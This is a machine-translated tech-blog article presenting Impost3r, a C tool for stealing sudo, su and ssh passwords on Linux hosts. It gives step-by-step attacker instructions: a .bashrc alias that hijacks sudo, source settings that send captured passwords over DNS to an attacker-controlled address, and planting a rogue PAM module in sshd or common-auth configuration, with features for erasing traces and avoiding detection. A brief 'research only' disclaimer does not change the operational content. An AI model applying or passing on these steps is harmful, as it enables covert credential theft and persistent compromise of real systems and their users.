Shulou(Shulou.com)05/31 Report--

This article will explain in detail what kind of tool Impost3r is. Xiaobian thinks it is quite practical, so share it with you for reference. I hope you can gain something after reading this article.

Impost3r is a password management tool for Linux platform, which is developed in C language and can help researchers obtain various passwords (ssh, su, sudo) from target Linux hosts during penetration testing.

This tool is limited to security research and teaching, please do not use it for malicious purposes.

functional properties

1. Automatically erase traces of password theft;

2. Transmitting results through DNS protocol;

3, no user interaction, users can not detect;

Dependency Component Tools Download

Researchers can clone the project source code locally using the following command:

git clone https://github.com/ph5ntonn/Impost3r.git tool usage

Impost3r can be used to steal passwords including sudo, su, ssh services, which can be roughly divided into two categories, sudo and ssh/su.

Stealing sudo passwords

It only requires normal user permissions, not root, but can only steal the password of the corresponding user, not other users.

First assume that an attacker takes control of a server with normal user privileges. Copy a copy of the user's.bashrccp ~/.bashrc /tmp/and place this copy in an attacker's custom path (in this case, in the/tmp/directory, which an attacker can modify). Modify.bashrc(~/.bashrc) in the user root directory and add the following statement to the last line (where "/tmp/.impost3r" needs to be consistent with FILENAME below):

alias sudo='impost3r() {if [ -f "/tmp/.impost3r" ]; then/tmp/.impost3r "$@" && unalias sudoelseunalias sudo;sudo "$@"fi}; impost3r'

When the addition is complete, save the file and execute:

source ~/.bashrc

The attacker then needs to modify the Impost3r source code/sudo/main.c.:

/* Custom setting*/# define FILENAME "/tmp/.impost3r" \\Set the location of Impost3r on the target server # define BACKUP_BASHRC "/tmp/.bashrc" \\Set the location of the attacker backup's source on the target server # define SAVE_OR_SEND 0 \\Set whether to save the results on the target machine or send them to the attacker-controlled machine (send =0, save =1, default to send)/* Send to server*/# define MAX_RESEND 30 \\Sets the maximum number of retries Impost3r can send a user password to an attacker server after password theft # define RESEND_INTERVAL 5 \\Sets the interval between each password transmission # define REMOTE_ADDRESS "192.168.0.12" \\Sets the remote address of the loopback password # define REMOTE_PORT 53 \\Sets the remote port of the loopback password/*Save to local*/# define SAVE_LOCATION "/tmp/.cache" \\Sets the location where the result file is saved, if SAVE_OR_SEND is set to 1

After modification, save and execute in current directory:

make

Get the compiled.impost3r file in the current directory, upload the.impost3r file to the/tmp/folder of the target server (for example only, you can modify it yourself, just the same as the definition in the source code). An attacker starts the dns server on his own server and waits for a legitimate user to use sudo to obtain the password.

Note: In the case of stealing sudo passwords, Impost3r will automatically erase traces after success, and does not require attackers to manually clean up.

Stealing ssh/su passwords

Stealing ssh/su password is different from the above sudo password stealing method. It requires root permission and can steal any user password.

Take Ubuntu as an example, first assume that the attacker controls a server and obtains root privileges through a power upgrade operation (or a cute administrator is a service started with root privileges). First edit the/ssh_su/main.c source code file of Impost3r.

/*Custom setting*/# define SSH_OR_BOTH 0 \\Set the stealing mode, 0 means stealing ssh password only, 1 means stealing ssh and su password, default is 0 (will talk about the difference later)# define SAVE_OR_SEND 0 \\Set whether to save the result on the target machine or send it to the machine controlled by the attacker (send =0, save =1, default is send)/* Send to server*/# define MAX_RESEND 30 \\Sets the maximum number of retries Impost3r can send a user password to an attacker server after password theft (valid only if SSH_OR_BOTH is 0)# define RESEND_INTERVAL 5 \\Sets the interval between each password transmission (valid only if SSH_OR_BOTH is 0)# define REMOTE_ADDRESS "192.168.0.12" \\Sets the remote address of the loopback password # define REMOTE_PORT 53 \\Sets the remote port of the loopback password/*Save to local*/# define SAVE_LOCATION "/tmp/.sshsucache" \\Sets the location where the results file is saved if SAVE_OR_SEND is set to 1

After modification, save and execute in current directory:

make

Get the compiled file impost3r.so, upload the compiled impost3r.so to/lib/x86_64-linux-gnu/security on the target machine (the folder name may be different on different machines, please place it according to the situation). Enter/etc/pam.d, there are two cases, if the selected mode is to steal only ssh password, then you need to execute vi sshd, add the following statement at the end of the file:

auth optional impost3r.soaccount optional impost3r.so

Save and exit, restart sshd service:

service sshd restart

If you choose to steal both ssh and su passwords, you need to execute:

vi common-auth

Add the same statement, save and exit the same restart sshd service. An attacker launches the dns server on his own server and waits for legitimate users to log on to the target machine using ssh or switch users using su to obtain passwords.

Note: In the case of stealing ssh/su passwords, Impost3r cannot remove traces due to permissions, and the attacker needs to remove them himself.

About "Impost3r is a tool" this article is shared here, I hope the above content can be of some help to everyone, so that you can learn more knowledge, if you think the article is good, please share it to let more people see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.